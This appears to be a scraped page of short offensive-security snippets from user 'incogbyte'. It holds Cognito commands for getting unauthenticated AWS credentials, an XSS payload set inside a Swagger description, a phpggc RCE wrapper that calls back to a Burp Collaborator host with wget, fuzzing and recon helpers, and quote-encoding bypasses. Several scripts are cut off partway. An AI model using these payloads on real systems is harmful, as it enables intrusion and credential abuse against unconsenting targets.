incogbyte

1. Generate temporary AWS credentials using unauth user 1.1 - Get the poolId 2.1 - IdendityID 3.1 - Use the following command on aws-cli "example" $ aws cognito-identity get-id --identity-pool-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"

   3.2 - Use the following command to get aws credentials $ aws cognito-identity get-credentials-for-identity --identity-id "us-east-1:f3400f4e-6a41-47db-834c-4af6d56e8359" --region "us-east-1"

incogbyte

swagger: '2.0'
info:
  title: Classic API Resource Documentation
  description: |
    <form><math><mtext></form><form><mglyph><svg><mtext><textarea><path id="</textarea><img onerror=alert('textarea') src=1>"></form>

  version: production
basePath: /JSSResource/
produces:
  - application/xml

incogbyte

#!/bin/bash

# Git clone this tool https://github.com/ambionics/phpggc
# phpggc wrapper that automatically generates payloads for RCE gadgets

function="system"
command="wget http://your.burpcollaborator.net/?"
# modify the options below depending on your use case
options="-a -b -u -f"

incogbyte

import re
import sys

def extract_subdomains(filename):
    subdomains = set()
    pattern = r"(?:https?://)?(?:www\.)?([^.]+\.[^.]+)"

    with open(filename, 'r') as file:
        for line in file:
            match = re.search(pattern, line)

incogbyte

1
10
11
12
13
14
15
16
17
18

incogbyte

#!/bin/bash


## Author: incogbyte
## Usage: ./ffuf_script.sh input.txt


extract_domain() {
    echo "$1" | awk -F/ '{print $3}'
}

incogbyte

text/html
text/plain
text/css
application/json
application/javascript
application/xml
application/pdf
image/jpeg
audio/mpeg
video/mp4

incogbyte

gitlab-ci.yml
gitlab-ci.yaml
gitalaci.yml
gitalaci.yml
build.xml
pom.xml
sonar.yml
sonar.yaml
dev-config.yaml
dev-hml.yaml

incogbyte

• Postman workspace

• site:postman.com inurl:/workspace "example"

incogbyte

#### unicodes - single quote
%u0027
%u02b9
%u02bc
%u02c8
%c0%27
%c0%a
%e0%80%a7